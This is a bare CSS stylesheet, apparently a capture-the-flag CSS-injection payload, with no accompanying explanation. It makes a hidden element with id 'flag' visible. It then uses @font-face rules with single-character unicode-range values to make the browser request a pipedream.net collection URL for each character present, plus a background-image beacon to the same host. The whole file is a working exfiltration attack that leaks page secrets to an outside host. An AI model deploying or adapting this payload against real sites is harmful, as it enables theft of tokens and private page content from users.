body{background-image:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=W21')}
#page{content-visibility:hidden;animation:unveil 0.001s 0.3s forwards}
@keyframes unveil{to{content-visibility:visible}}
#flag{display:block!important}
#flag{font-family:p97w21,p98w21,p106w21,p112w21,p115w21,p121w21,p122w21,p48w21,p49w21,p52w21,p53w21,p55w21,p125w21,monospace;width:21ch;white-space:pre-wrap;word-break:break-all;overflow:visible}
#flag::first-line{font-family:monospace!important}
@font-face{font-family:p97w21;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=a_W21');unicode-range:U+0061}
@font-face{font-family:p98w21;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=b_W21');unicode-range:U+0062}
@font-face{font-family:p106w21;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=j_W21');unicode-range:U+006A}
@font-face{font-family:p112w21;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=p_W21');unicode-range:U+0070}
@font-face{font-family:p115w21;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=s_W21');unicode-range:U+0073}
@font-face{font-family:p121w21;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=y_W21');unicode-range:U+0079}
@font-face{font-family:p122w21;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=z_W21');unicode-range:U+007A}
@font-face{font-family:p48w21;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=0_W21');unicode-range:U+0030}
@font-face{font-family:p49w21;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=1_W21');unicode-range:U+0031}
@font-face{font-family:p52w21;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=4_W21');unicode-range:U+0034}
@font-face{font-family:p53w21;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=5_W21');unicode-range:U+0035}
@font-face{font-family:p55w21;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=7_W21');unicode-range:U+0037}
@font-face{font-family:p125w21;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=%7D_W21');unicode-range:U+007D}